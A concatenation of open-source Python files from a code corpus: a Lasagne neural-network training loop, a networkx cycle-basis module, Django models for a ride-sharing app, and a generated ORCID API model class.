loss = T.mean(lasagne.objectives.categorical_crossentropy(prediction, target_var))
acc = T.mean(T.eq(T.argmax(prediction, axis=1), target_var),dtype=theano.config.floatX)
params = lasagne.layers.get_all_params(network, trainable=True)
if gradient == 'sgd':
updates = mysgd(loss, params, LEARNING_RATE)
elif gradient == 'sgd_adagrad':
updates = mysgd_adagrad(loss, params, LEARNING_RATE)
elif gradient == 'svrg':
updates = custom_svrg2(loss,params, m=100, learning_rate = LEARNING_RATE, objective=lasagne.objectives.categorical_crossentropy , data=input_var, target = target_var, getpred= getpred)
test_prediction = lasagne.layers.get_output(network, deterministic=True)
test_loss = lasagne.objectives.categorical_crossentropy(test_prediction,target_var)
test_loss = test_loss.mean()
test_acc = T.mean(T.eq(T.argmax(test_prediction, axis=1), target_var),dtype=theano.config.floatX)
# Compile a function performing a training step on a mini-batch (by giving
# the updates dictionary) and returning the corresponding training loss:
train_fn = theano.function([input_var, target_var], loss, updates=updates)
train_acc = theano.function([input_var, target_var], acc)
# Compile a second function computing the validation loss and accuracy:
val_fn = theano.function([input_var, target_var], [test_loss, test_acc])
# Finally, launch the training loop.
print("Starting training...")
# We iterate over epochs:
loss_train = []
loss_val = []
acc_val = []
acc_train = []
acc_test = []
loss_test = []
times = []
start_time = time.time()
for epoch in range(NUM_EPOCHS):
# In each epoch, we do a full pass over the training data:
train_err = 0
tmp_acc = 0
train_batches = 0
for batch in iterate_minibatches(X_train, y_train, BATCH_SIZE, shuffle=True):
inputs, targets = batch
train_err += train_fn(inputs, targets)
tmp_acc += train_acc(inputs, targets)
train_batches += 1
# And a full pass over the validation data:
val_err = 0
val_acc = 0
val_batches = 0
for batch in iterate_minibatches(X_val, y_val, BATCH_SIZE, shuffle=False):
inputs, targets = batch
err, acc = val_fn(inputs, targets)
val_err += err
val_acc += acc
val_batches += 1
# and a full pass over the test data, bingo!
test_err = 0
test_acc = 0
test_batches = 0
for batch in iterate_minibatches(X_test, y_test, BATCH_SIZE, shuffle=False):
inputs, targets = batch
err, acc = val_fn(inputs, targets)
test_err += err
test_acc += acc
test_batches += 1
# Then we print the results for this epoch:
times.append(time.time() - start_time)
print("Epoch {} of {} took {:.3f}s".format(epoch + 1, num_epochs, time.time() - start_time))
loss_train.append(train_err / train_batches)
acc_train.append(tmp_acc / train_batches)
print(" training loss:\t\t{:.6f}".format(train_err / train_batches))
loss_val.append(val_err / val_batches)
print(" validation loss:\t\t{:.6f}".format(val_err / val_batches))
acc_val.append(val_acc / val_batches)
print(" validation accuracy:\t\t{:.2f} %".format(
val_acc / val_batches * 100))
acc_test.append(test_acc / test_batches)
loss_test.append(test_err / test_batches)
print(" test accuracy:\t\t{:.2f} %".format(test_acc / test_batches * 100))
# print(" test loss:\t\t{:.2f}".format(test_err / val_batches))
# After training, we compute and print the test error:
test_err = 0
test_acc = 0
test_batches = 0
for batch in iterate_minibatches(X_test, y_test, BATCH_SIZE, shuffle=False):
inputs, targets = batch
err, acc = val_fn(inputs, targets)
test_err += err
test_acc += acc
test_batches += 1
print("Final results:")
print(" test loss:\t\t\t{:.6f}".format(test_err / test_batches))
print(" test accuracy:\t\t{:.2f} %".format(test_acc / test_batches * 100))
print(" average time per epoch :\t\t{:.3f} s".format(np.mean(times)))
print("result/"+model+"_"+gradient+"_"+bnalg+".txt")
file_handle=open("result/"+model+"_"+gradient+"_"+bnalg+".txt", 'w+')
file_handle.write("Final results:\n")
file_handle.write(" test loss:\t\t\t{:.6f}\n".format(test_err / test_batches))
file_handle.write(" test accuracy:\t\t{:.2f} %".format(test_acc / test_batches * 100))
count = (np.arange(NUM_EPOCHS)+1) #*X_train.shape[0]
#PLOT
matplotlib.rcParams.update({'font.size': 16})
plt.figure(1)
plt.plot(count, loss_train, 'bs-',label="Training Set")
plt.title(model+'-'+gradient+'-Loss of Training/Validation Set')
plt.plot(count, loss_val, 'ro--',label="Validation Set")
plt.xlabel('# Epochs')
plt.ylabel('Loss')
plt.legend()
# plt.show()
pylab.savefig(OUTPUT_FIGURE_PATH+'fig_LossTrain-'+model+'-'+gradient+'-'+str(NUM_EPOCHS)+'.png',
bbox_inches='tight')
plt.figure(2)
plt.plot(count, acc_train, 'bs-',label="Training Set")
plt.title(model+'-'+gradient+'-Predict Accuracy of Training/Validation Set')
plt.plot(count, acc_val, 'ro--',label="Validation Set")
plt.plot(count, acc_test, 'g^:',label="Test Set")
plt.xlabel('# Epochs')
plt.ylabel('Predict Accuracy')
plt.legend(bbox_to_anchor=(1,0.25))
# plt.show()
pylab.savefig(OUTPUT_FIGURE_PATH+'fig_Pred-'+model+'-'+gradient+'-'+str(NUM_EPOCHS)+'.png',
bbox_inches='tight')
print ("Finish plotting...")
np.savetxt(OUTPUT_DATA_PATH+model+"_"+gradient+"_"+str(NUM_EPOCHS)+"_"+bnalg+"_"+"loss_train.txt",loss_train)
np.savetxt(OUTPUT_DATA_PATH+model+"_"+gradient+"_"+str(NUM_EPOCHS)+"_"+bnalg+"_"+"loss_val.txt",loss_val)
np.savetxt(OUTPUT_DATA_PATH+model+"_"+gradient+"_"+str(NUM_EPOCHS)+"_"+bnalg+"_"+"acc_train.txt",acc_train)
np.savetxt(OUTPUT_DATA_PATH+model+"_"+gradient+"_"+str(NUM_EPOCHS)+"_"+bnalg+"_"+"acc_val.txt",acc_val)
np.savetxt(OUTPUT_DATA_PATH+model+"_"+gradient+"_"+str(NUM_EPOCHS)+"_"+bnalg+"_"+"acc_test.txt",acc_test)
np.savetxt(OUTPUT_DATA_PATH+model+"_"+gradient+"_"+str(NUM_EPOCHS)+"_"+bnalg+"_"+"loss_test.txt",loss_test)
np.savetxt(OUTPUT_DATA_PATH+model+"_"+gradient+"_"+str(NUM_EPOCHS)+"_"+bnalg+"_"+"epoch_times.txt",times)
print ("Data saved...")
# Optionally, you could now dump the network weights to a file like this:
# np.savez('model.npz', *lasagne.layers.get_all_param_values(network))
#
# And load them again later on like this:
# with np.load('model.npz') as f:
# param_values = [f['arr_%d' % i] for i in range(len(f.files))]
# lasagne.layers.set_all_param_values(network, param_values)
if __name__ == '__main__':
if ('--help' in sys.argv) or ('-h' in sys.argv) or ('help' in sys.argv):
print("Trains a neural network on MNIST using Lasagne.")
print("Usage: %s [MODEL] [GRADIENT] [NUM_EPOCHS]" % sys.argv[0])
print()
print("MODEL: 'mlp' for a simple Multi-Layer Perceptron (MLP),")
print(" 'mlpbn: for an MLP with batch Normalization")
print("GRADIENT: 'sgd', 'svrg'")
print("NUM_EPOCHS: ")
print("NUM_HIDDEN_UNITS: ")
print("BNALG: ")
else:
kwargs = {}
if len(sys.argv) > 1:
kwargs['model'] = sys.argv[1]
if len(sys.argv) > 2:
kwargs['gradient'] = sys.argv[2]
if len(sys.argv) > 3:
kwargs['num_epochs'] = int(sys.argv[3])
if len(sys.argv) > 4:
kwargs['num_hidden_units'] = int(sys.argv[4])
if len(sys.argv) > 5:
kwargs['bnalg'] = sys.argv[5]
main(**kwargs)
| myt00seven/svrg | cifar/large_gpu_cifar10_ffn.py | Python | mit | 20,715 |
#!/usr/bin/env python
"""
cycle_basis.py
functions for calculating the cycle basis of a graph
"""
from numpy import *
import networkx as nx
import matplotlib
import matplotlib.pyplot as plt
from matplotlib import cm
from matplotlib.path import Path
if matplotlib.__version__ >= '1.3.0':
from matplotlib.path import Path
else:
from matplotlib import nxutils
from itertools import chain
from itertools import ifilterfalse
from itertools import izip
from itertools import tee
from collections import defaultdict
import time
from helpers import *
class Cycle():
""" Represents a set of nodes that make up a cycle in some
graph. Is hashable and does not care about orientation or things
like that, two cycles are equal if they share the same nodes.
A cycle can be compared to a set or frozenset of nodes.
path is a list of vertices describing a closed path in the cycle.
if it is absent, a closed path will be calculated together with
coordinates.
coords is an array of x-y pairs representing the coordinates of
the cycle path elements.
"""
def __init__(self, graph, edges, coords=None):
""" Initializes the Cycle with an edge list representing the
cycle.
All edges should be ordered such that a cycle is represented
as
(1,2)(2,3)(3,4)...(n-2,n-1)(n-1,1)
Parameters:
graph: The underlying graph object
edges: The edge list making up the cycle.
is_ordered: If set to false, will use the neighborhood
information from graph to construct ordered edge set
from unordered one.
In case the unordered edge set is not a connected graph,
e.g. when removing one cycle splits the surrounding
one in half, the smaller connected component in terms
of total length is thrown away. Since our cycles are
typically convex, this means we use the outermost
component.
"""
self.graph = graph
edges, self.total_area = self.ordered_edges(edges)
self.path = zip(*edges)[0]
if coords is None:
self.coords = array([[graph.node[n]['x'], graph.node[n]['y']]
for n in self.path])
else:
self.coords = coords
self.edges = edges
# This allows comparisons
self.edgeset = set([tuple(sorted(e)) for e in edges])
self.com = mean(self.coords, axis=0)
# This frozenset is used to compare/hash cycles.
self._nodeset = frozenset(self.path)
def ordered_edges(self, edges):
""" Uses the graph associated to this cycle to order
the unordered edge set.
Also return the area of the cycle. This is defined as
max(Areas of individual connected components) -
(Areas of other connected components)
This assumes that the cycle is one large cycle containing
one or more smaller cycles.
"""
# construct subgraph consisting of only the specified edges
edge_graph = nx.Graph(edges)
con = sorted_connected_components(edge_graph)
# Calculate sorted edge list for each connected component
# of the cycle
component_sorted_edges = []
areas = []
G = self.graph
for comp in con:
# get ordered list of edges
component_edges = comp.edges()
n_edges = len(component_edges)
sorted_edges = []
start = component_edges[0][0]
cur = start
prev = None
for i in xrange(n_edges):
nextn = [n for n in comp.neighbors(cur)
if n != prev][0]
sorted_edges.append((cur, nextn))
prev = cur
cur = nextn
# coordinates of path
coords = array([(G.node[u]['x'], G.node[u]['y'])
for u, v in sorted_edges] \
+ [(G.node[sorted_edges[0][0]]['x'],
G.node[sorted_edges[0][0]]['y'])])
areas.append(polygon_area(coords))
component_sorted_edges.append(sorted_edges)
if len(areas) > 1:
areas = sorted(areas, reverse=True)
total_area = areas[0] - sum(areas[1:])
else:
total_area = areas[0]
return list(chain.from_iterable(
sorted(component_sorted_edges, key=len, reverse=True))), \
total_area
def intersection(self, other):
""" Returns an edge set representing the intersection of
the two cycles.
"""
inters = self.edgeset.intersection(other.edgeset)
return inters
def union(self, other, data=True):
""" Returns the edge set corresponding to the union of two cycles.
Will overwrite edge/vertex attributes from other to this,
so only use if both cycle graphs are the same graph!
"""
union = self.edgeset.union(other.edgeset)
return union
def symmetric_difference(self, other, intersection=None):
""" Returns a Cycle corresponding to the symmetric difference of
the Cycle and other. This is defined as the set of edges which
is present in either cycle but not in both.
If the intersection has been pre-calculated it can be used.
This will fail on non-adjacent loops.
"""
new_edgeset = list(self.edgeset.symmetric_difference(
other.edgeset))
return Cycle(self.graph, new_edgeset)
def area(self):
""" Returns the area enclosed by the polygon defined by the
Cycle. If the cycle contains more than one connected component,
this is defined as the area of the largest area connected
component minus the areas of the other connected components.
"""
return self.total_area
def radii(self):
""" Return the radii of all edges in this cycle.
"""
return array([self.graph[u][v]['conductivity']
for u, v in self.edgeset])
def __hash__(self):
""" Implements hashing by using the internal set description's hash
"""
return self._nodeset.__hash__()
def __eq__(self, other):
""" Implements comparison using the internal set description
"""
if isinstance(other, Cycle):
return self._nodeset.__eq__(other._nodeset)
elif isinstance(other, frozenset) or isinstance(other, set):
return self._nodeset.__eq__(other)
else:
return -1
def __repr__(self):
return repr(self._nodeset)
def polygon_area(coords):
""" Return the area of a closed polygon
"""
Xs = coords[:,0]
Ys = coords[:,1]
# Ignore orientation
return 0.5*abs(sum(Xs[:-1]*Ys[1:] - Xs[1:]*Ys[:-1]))
def traverse_graph(G, start, nextn):
""" Traverses the pruned (i.e. ONLY LOOPS) graph G counter-clockwise
in the direction of nextn until start is hit again.
If G has treelike components this will fail and get stuck, there
is no backtracking.
Returns a list of nodes visited, a list of edges visited and
an array of node coordinates.
This will find (a) all internal
smallest loops (faces of the planar graph) and (b) one maximal
outer loop
"""
start_coords = array([G.node[start]['x'], G.node[start]['y']])
nodes_visited = [start]
nodes_visited_set = set()
edges_visited = []
coords = [start_coords]
prev = start
cur = nextn
while cur != start:
cur_coords = array([G.node[cur]['x'], G.node[cur]['y']])
# We ignore all neighbors we alreay visited to avoid multiple loops
neighs = [n for n in G.neighbors(cur) if n != prev and n != cur]
edges_visited.append((prev, cur))
nodes_visited.append(cur)
coords.append(cur_coords)
n_neighs = len(neighs)
if n_neighs > 1:
# Choose path that keeps the loop closest on the left hand side
prev_coords = array([G.node[prev]['x'], G.node[prev]['y']])
neigh_coords = array([[G.node[n]['x'], G.node[n]['y']] \
for n in neighs])
## Construct vectors and normalize
u = cur_coords - prev_coords
vs = neigh_coords - cur_coords
# calculate cos and sin between direction vector and neighbors
u /= sqrt((u*u).sum(-1))
vs /= sqrt((vs*vs).sum(-1))[...,newaxis]
coss = dot(u, vs.T)
sins = cross(u, vs)
# this is a function between -2 and +2, where the
# leftmost path corresponds to -2, rightmost to +2
# sgn(alpha)(cos(alpha) - 1)
ranked = sign(sins)*(coss - 1.)
prev = cur
cur = neighs[argmin(ranked)]
else:
# No choice to make
prev = cur
cur = neighs[0]
# Remove pathological protruding loops
if prev in nodes_visited_set:
n_ind = nodes_visited.index(prev)
del nodes_visited[n_ind+1:]
del coords[n_ind+1:]
del edges_visited[n_ind:]
nodes_visited_set.add(prev)
edges_visited.append((nodes_visited[-1], nodes_visited[0]))
return nodes_visited, edges_visited, array(coords)
def cycle_mtp_path(cycle):
""" Returns a matplotlib Path object describing the cycle.
"""
# Set up polygon
verts = zeros((cycle.coords.shape[0] + 1, cycle.coords.shape[1]))
verts[:-1,:] = cycle.coords
verts[-1,:] = cycle.coords[0,:]
codes = Path.LINETO*ones(verts.shape[0])
codes[0] = Path.MOVETO
codes[-1] = Path.CLOSEPOLY
return Path(verts, codes)
def outer_loop(G, cycles):
""" Detects the boundary loop in the set of fundamental cycles
by noting that the boundary is precisely the one loop with
maximum area (since it contains all other loops, they all must
have smaller area)
"""
return max([(c.area(), c) for c in cycles])[1]
def shortest_cycles(G):
""" Returns a list of lists of Cycle objects belonging to the
fundamental cycles of the pruned (i.e. there are no treelike
components) graph G by traversing the graph counter-clockwise
for each node until the starting node has been found.
Also returns the outer loop.
"""
cycleset = set()
# Betti number counts interior loops, this algorithm finds
# exterior loop as well!
n_cycles = G.number_of_edges() - G.number_of_nodes() + 1
# Count outer loop as well
if n_cycles >= 2:
n_cycles += 1
print "Number of cycles including boundary: {}.".format(n_cycles)
t0 = time.time()
mst = nx.minimum_spanning_tree(G, weight=None)
for u, v in G.edges_iter():
if not mst.has_edge(u, v):
# traverse cycle in both directions
path, edges, coords = traverse_graph(G, u, v)
cycleset.add(Cycle(G, edges, coords=coords))
path, edges, coords = traverse_graph(G, v, u)
cycleset.add(Cycle(G, edges, coords=coords))
if len(cycleset) != n_cycles:
print "WARNING: Found only", len(cycleset), "cycles!!"
t1 = time.time()
print "Detected fundamental cycles in {}s".format(t1 - t0)
#print "Number of detected facets:", len(cycleset)
return list(cycleset)
def find_neighbor_cycles(G, cycles):
""" Returns a set of tuples of cycle indices describing
which cycles share edges
"""
n_c = len(cycles)
# Construct edge dictionary
edges = defaultdict(list)
for i in xrange(n_c):
for e in cycles[i].edges:
edges[tuple(sorted(e))].append(i)
# Find all neighboring cycles
neighbor_cycles = set()
for n in edges.values():
neighbor_cycles.add(tuple(sorted(n)))
return neighbor_cycles
| hronellenfitsch/nesting | cycle_basis.py | Python | mit | 11,955 |
from __future__ import unicode_literals
import re
from django.contrib.auth.models import (AbstractBaseUser, PermissionsMixin,
UserManager)
from django.core import validators
from django.core.mail import send_mail
from django.utils.translation import ugettext_lazy as _
from notifications.models import *
from broadcast.models import Broadcast
class CustomUser(AbstractBaseUser, PermissionsMixin):
"""
A custom user class that basically mirrors Django's `AbstractUser` class
and doesn'0t force `first_name` or `last_name` with sensibilities for
international names.
http://www.w3.org/International/questions/qa-personal-names
"""
username = models.CharField(_('username'), max_length=30, unique=True,
help_text=_('Required. 30 characters or fewer. Letters, numbers and '
'@/./+/-/_ characters'),
validators=[
validators.RegexValidator(re.compile(
'^[\w.@+-]+$'), _('Enter a valid username.'), 'invalid')
])
full_name = models.CharField(_('full name'), max_length=254, blank=False)
short_name = models.CharField(_('short name'), max_length=30, blank=True)
choices = (('Male', 'Male'), ('Female', 'Female'))
sex = models.CharField(_('sex'), max_length=30, blank=False, choices=choices)
email = models.EmailField(_('email address'), max_length=254, unique=True)
phone_number = models.CharField(_('phone number'), max_length=20, validators=[
validators.RegexValidator(re.compile(
'^[0-9]+$'), _('Only numbers are allowed.'), 'invalid')
])
user_choices = (('Driver', 'Driver'), ('Passenger', 'Passenger'))
user_type = models.CharField(_('user type'), max_length=30, blank=False, choices=user_choices)
address = models.TextField(_('location'), max_length=400, blank=False)
is_staff = models.BooleanField(_('staff status'), default=False,
help_text=_('Designates whether the user can log into this admin '
'site.'))
is_verified = models.BooleanField(_('user verified'), default=False,
help_text=_('Designates whether the user is a vershified user'))
is_active = models.BooleanField(_('active'), default=True,
help_text=_('Designates whether this user should be treated as '
'active. Unselect this instead of deleting accounts.'))
date_joined = models.DateTimeField(_('date joined'), default=timezone.now)
objects = UserManager()
USERNAME_FIELD = 'username'
REQUIRED_FIELDS = ['email']
class Meta:
verbose_name = _('user')
verbose_name_plural = _('users')
def __unicode__(self):
return self.username
def get_absolute_url(self):
return "/profile/%s" % self.username
def get_full_name(self):
"""
Returns the first_name plus the last_name, with a space in between.
"""
full_name = self.full_name
return full_name.strip()
def get_short_name(self):
"Returns the short name for the user."
return self.short_name.strip()
def get_sex(self):
return self.sex
def email_user(self, subject, message, from_email=None):
"""
Sends an email to this User.
"""
send_mail(subject, message, from_email, [self.email])
def get_no_messages(self):
number = Message.objects.filter(recipient=self, read=False)
if number.count() > 0:
return number.count()
else:
return None
def get_messages(self):
msg = Message.objects.filter(recipient=self, read=False).order_by('date').reverse()
return msg
def get_messages_all(self):
msg = Message.objects.filter(recipient=self).order_by('date').reverse()
return msg
def get_notifications(self):
return self.notifications.unread()
def get_no_notifs(self):
return self.notifications.unread().count()
def is_follows(self, user_1):
foll = Follow.objects.filter(follower=self, followee=user_1)
if foll.exists():
return True
else:
return False
def get_no_followers(self):
num = Follow.objects.filter(followee=self).count()
return num
def get_no_following(self):
num = Follow.objects.filter(follower=self).count()
return num
def get_following(self):
num = Follow.objects.filter(follower=self).values_list('followee')
result = []
for follower in num:
user = CustomUser.objects.get(pk=follower[0])
result.append(user)
return result
def get_profile(self):
profile = Profile.objects.get(user=self)
return profile
def no_of_rides_shared(self):
return self.vehiclesharing_set.filter(user=self, ended=True).count()
def no_of_request_completed(self):
return self.request_set.filter(status='approved', user=self).count()
def get_no_broadcast(self):
return Broadcast.objects.filter(user=self).count()
def get_broadcast(self):
all_broad = Broadcast.objects.filter(user=self)[0:10]
return all_broad
class Vehicle(models.Model):
year = models.IntegerField(_('year of purchase'), blank=False)
make = models.CharField(_('vehicle make'), max_length=254, blank=False)
plate = models.CharField(_('liscenced plate number'), max_length=10, blank=False)
model = models.CharField(_('vehicle model'), max_length=254, blank=False)
seats = models.IntegerField(_('no of seats'), blank=False)
user_choices = (('private', 'private'), ('hired', 'hired'))
type = models.CharField(_('vehicle type'), max_length=30, blank=False, choices=user_choices)
user_choices = (('Car', 'Car'), ('Bus', 'Bus'), ('Coaster', 'Coaster'), ('Truck', 'Truck'))
category = models.CharField(_('vehicle category'), max_length=30, blank=False, choices=user_choices)
user = models.ForeignKey(CustomUser, on_delete=models.CASCADE)
def get_absolute_url(self):
return "/app/ride/%d/view" % self.pk
def __str__(self):
return self.make + " " + self.model + " belonging to " + self.user.username
class VehicleSharing(models.Model):
start = models.CharField(_('starting point'), max_length=256, blank=False, )
dest = models.CharField(_('destination'), max_length=256, blank=False)
cost = models.IntegerField(_('cost'), blank=False)
date = models.DateField(_('date'), default=timezone.now)
start_time = models.TimeField(_('start time'), max_length=256, blank=False)
arrival_time = models.TimeField(_('estimated arrivak'), max_length=256, blank=False)
no_pass = models.IntegerField(_('no of passengers'), blank=False)
details = models.TextField(_('ride details'), blank=False)
choices = (('Male', 'Male'), ('Female', 'Female'), ('Both', 'Both'))
sex = models.CharField(_('gender preference'), max_length=30, blank=False, choices=choices)
user = models.ForeignKey(CustomUser, on_delete=models.CASCADE)
vehicle = models.ForeignKey(Vehicle, on_delete=models.CASCADE)
ended = models.BooleanField(_('sharing ended'), default=False)
def __str__(self):
return self.start + " to " + self.dest
def get_user(self):
return self.user
def get_absolute_url(self):
return "/app/sharing/%d/view" % self.pk
class Request(models.Model):
pick = models.CharField(_('pick up point'), max_length=256, blank=False, )
dest = models.CharField(_('destination'), max_length=256, blank=False)
reg_date = models.DateTimeField(_('registration date'), default=timezone.now)
user = models.ForeignKey(CustomUser, on_delete=models.CASCADE)
bearable = models.IntegerField(_('bearable cost'), blank=False)
status = models.CharField(_('status'), max_length=256, blank=False, default='pending')
ride = models.ForeignKey(VehicleSharing, on_delete=models.CASCADE)
def __str__(self):
return "request from " + self.user.get_full_name() + " on " + self.reg_date.isoformat(' ')[0:16]
def get_absolute_url(self):
return "/app/request/%d/view" % self.pk
class Message(models.Model):
sender = models.ForeignKey(CustomUser, related_name='sender', on_delete=models.CASCADE)
recipient = models.ForeignKey(CustomUser, related_name='recipient', on_delete=models.CASCADE)
subject = models.CharField(default='(No Subject)', max_length=256)
message = models.TextField(blank=False)
date = models.DateTimeField(_('time sent'), default=timezone.now)
read = models.BooleanField(_('read'), default=False)
deleted = models.BooleanField(_('deleted'), default=False)
def __str__(self):
return self.sender.username + ' to ' + self.recipient.username + ' - ' + self.message[0:20] + '...'
def url(self):
return '/app/user/dashboard/messages/%d/read/' % self.pk
def send(self, user, recipient, subject, message):
message = Message()
message.sender = user
message.recipient = recipient
message.subject = subject
message.message = message
message.save()
class Follow(models.Model):
follower = models.ForeignKey(CustomUser, related_name='follower', on_delete=models.CASCADE, default=None)
followee = models.ForeignKey(CustomUser, related_name='followee', on_delete=models.CASCADE, default=None)
time = models.DateTimeField(_('time'), default=timezone.now)
def __unicode__(self):
return str(self.follower) + ' follows ' + str(self.followee)
def __str__(self):
return str(self.follower) + ' follows ' + str(self.followee)
def is_follows(self, user_1, user_2):
foll = Follow.objects.filter(user=user_1, follower=user_2)
if foll.exists():
return True
else:
return False
def get_absolute_url(self):
return "/app/profile/%s" % self.follower.username
class Profile(models.Model):
user = models.OneToOneField(CustomUser, related_name='profile', on_delete=models.CASCADE, unique=True)
picture = models.FileField(blank=True, default='user.png')
education = models.TextField(blank=True)
work = models.TextField(blank=True)
social_facebook = models.CharField(max_length=256, blank=True)
social_twitter = models.CharField(max_length=256, blank=True)
social_instagram = models.CharField(max_length=256, blank=True)
bio = models.TextField(blank=True)
is_public = models.BooleanField(default=False)
def __str__(self):
return self.user.username
class DriverInfo(models.Model):
driver = models.OneToOneField(CustomUser, on_delete=models.CASCADE)
liscence_no = models.CharField(_('liscence number'), max_length=30, blank=False)
date_issuance = models.DateField(_('date of first issuance'), blank=True)
scanned = models.ImageField(_('picture of driver\'s liscence'), blank=True)
confirmed = models.BooleanField(_('confirmed'), default=False)
| othreecodes/MY-RIDE | app/models.py | Python | mit | 11,305 |
# coding: utf-8
"""
ORCID Member
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: Latest
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from orcid_api_v3.models.created_date_v30 import CreatedDateV30 # noqa: F401,E501
from orcid_api_v3.models.external_i_ds_v30 import ExternalIDsV30 # noqa: F401,E501
from orcid_api_v3.models.fuzzy_date_v30 import FuzzyDateV30 # noqa: F401,E501
from orcid_api_v3.models.last_modified_date_v30 import LastModifiedDateV30 # noqa: F401,E501
from orcid_api_v3.models.organization_v30 import OrganizationV30 # noqa: F401,E501
from orcid_api_v3.models.source_v30 import SourceV30 # noqa: F401,E501
from orcid_api_v3.models.url_v30 import UrlV30 # noqa: F401,E501
class EducationSummaryV30(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'created_date': 'CreatedDateV30',
'last_modified_date': 'LastModifiedDateV30',
'source': 'SourceV30',
'put_code': 'int',
'department_name': 'str',
'role_title': 'str',
'start_date': 'FuzzyDateV30',
'end_date': 'FuzzyDateV30',
'organization': 'OrganizationV30',
'url': 'UrlV30',
'external_ids': 'ExternalIDsV30',
'display_index': 'str',
'visibility': 'str',
'path': 'str'
}
attribute_map = {
'created_date': 'created-date',
'last_modified_date': 'last-modified-date',
'source': 'source',
'put_code': 'put-code',
'department_name': 'department-name',
'role_title': 'role-title',
'start_date': 'start-date',
'end_date': 'end-date',
'organization': 'organization',
'url': 'url',
'external_ids': 'external-ids',
'display_index': 'display-index',
'visibility': 'visibility',
'path': 'path'
}
def __init__(self, created_date=None, last_modified_date=None, source=None, put_code=None, department_name=None, role_title=None, start_date=None, end_date=None, organization=None, url=None, external_ids=None, display_index=None, visibility=None, path=None): # noqa: E501
"""EducationSummaryV30 - a model defined in Swagger""" # noqa: E501
self._created_date = None
self._last_modified_date = None
self._source = None
self._put_code = None
self._department_name = None
self._role_title = None
self._start_date = None
self._end_date = None
self._organization = None
self._url = None
self._external_ids = None
self._display_index = None
self._visibility = None
self._path = None
self.discriminator = None
if created_date is not None:
self.created_date = created_date
if last_modified_date is not None:
self.last_modified_date = last_modified_date
if source is not None:
self.source = source
if put_code is not None:
self.put_code = put_code
if department_name is not None:
self.department_name = department_name
if role_title is not None:
self.role_title = role_title
if start_date is not None:
self.start_date = start_date
if end_date is not None:
self.end_date = end_date
if organization is not None:
self.organization = organization
if url is not None:
self.url = url
if external_ids is not None:
self.external_ids = external_ids
if display_index is not None:
self.display_index = display_index
if visibility is not None:
self.visibility = visibility
if path is not None:
self.path = path
@property
def created_date(self):
"""Gets the created_date of this EducationSummaryV30. # noqa: E501
:return: The created_date of this EducationSummaryV30. # noqa: E501
:rtype: CreatedDateV30
"""
return self._created_date
@created_date.setter
def created_date(self, created_date):
"""Sets the created_date of this EducationSummaryV30.
:param created_date: The created_date of this EducationSummaryV30. # noqa: E501
:type: CreatedDateV30
"""
self._created_date = created_date
@property
def last_modified_date(self):
"""Gets the last_modified_date of this EducationSummaryV30. # noqa: E501
:return: The last_modified_date of this EducationSummaryV30. # noqa: E501
:rtype: LastModifiedDateV30
"""
return self._last_modified_date
@last_modified_date.setter
def last_modified_date(self, last_modified_date):
"""Sets the last_modified_date of this EducationSummaryV30.
:param last_modified_date: The last_modified_date of this EducationSummaryV30. # noqa: E501
:type: LastModifiedDateV30
"""
self._last_modified_date = last_modified_date
@property
def source(self):
"""Gets the source of this EducationSummaryV30. # noqa: E501
:return: The source of this EducationSummaryV30. # noqa: E501
:rtype: SourceV30
"""
return self._source
@source.setter
def source(self, source):
"""Sets the source of this EducationSummaryV30.
:param source: The source of this EducationSummaryV30. # noqa: E501
:type: SourceV30
"""
self._source = source
@property
def put_code(self):
"""Gets the put_code of this EducationSummaryV30. # noqa: E501
:return: The put_code of this EducationSummaryV30. # noqa: E501
:rtype: int
"""
return self._put_code
@put_code.setter
def put_code(self, put_code):
"""Sets the put_code of this EducationSummaryV30.
:param put_code: The put_code of this EducationSummaryV30. # noqa: E501
:type: int
"""
self._put_code = put_code
@property
def department_name(self):
"""Gets the department_name of this EducationSummaryV30. # noqa: E501
:return: The department_name of this EducationSummaryV30. # noqa: E501
:rtype: str
"""
return self._department_name
@department_name.setter
def department_name(self, department_name):
"""Sets the department_name of this EducationSummaryV30.
:param department_name: The department_name of this EducationSummaryV30. # noqa: E501
:type: str
"""
self._department_name = department_name
@property
def role_title(self):
"""Gets the role_title of this EducationSummaryV30. # noqa: E501
:return: The role_title of this EducationSummaryV30. # noqa: E501
:rtype: str
"""
return self._role_title
@role_title.setter
def role_title(self, role_title):
"""Sets the role_title of this EducationSummaryV30.
:param role_title: The role_title of this EducationSummaryV30. # noqa: E501
:type: str
"""
self._role_title = role_title
@property
def start_date(self):
"""Gets the start_date of this EducationSummaryV30. # noqa: E501
:return: The start_date of this EducationSummaryV30. # noqa: E501
:rtype: FuzzyDateV30
"""
return self._start_date
@start_date.setter
def start_date(self, start_date):
"""Sets the start_date of this EducationSummaryV30.
:param start_date: The start_date of this EducationSummaryV30. # noqa: E501
:type: FuzzyDateV30
"""
self._start_date = start_date
@property
def end_date(self):
"""Gets the end_date of this EducationSummaryV30. # noqa: E501
:return: The end_date of this EducationSummaryV30. # noqa: E501
:rtype: FuzzyDateV30
"""
return self._end_date
@end_date.setter
def end_date(self, end_date):
"""Sets the end_date of this EducationSummaryV30.
:param end_date: The end_date of this EducationSummaryV30. # noqa: E501
:type: FuzzyDateV30
"""
self._end_date = end_date
@property
def organization(self):
"""Gets the organization of this EducationSummaryV30. # noqa: E501
:return: The organization of this EducationSummaryV30. # noqa: E501
:rtype: OrganizationV30
"""
return self._organization
@organization.setter
def organization(self, organization):
"""Sets the organization of this EducationSummaryV30.
:param organization: The organization of this EducationSummaryV30. # noqa: E501
:type: OrganizationV30
"""
self._organization = organization
@property
def url(self):
"""Gets the url of this EducationSummaryV30. # noqa: E501
:return: The url of this EducationSummaryV30. # noqa: E501
:rtype: UrlV30
"""
return self._url
@url.setter
def url(self, url):
"""Sets the url of this EducationSummaryV30.
:param url: The url of this EducationSummaryV30. # noqa: E501
:type: UrlV30
"""
self._url = url
@property
def external_ids(self):
"""Gets the external_ids of this EducationSummaryV30. # noqa: E501
:return: The external_ids of this EducationSummaryV30. # noqa: E501
:rtype: ExternalIDsV30
"""
return self._external_ids
@external_ids.setter
def external_ids(self, external_ids):
"""Sets the external_ids of this EducationSummaryV30.
:param external_ids: The external_ids of this EducationSummaryV30. # noqa: E501
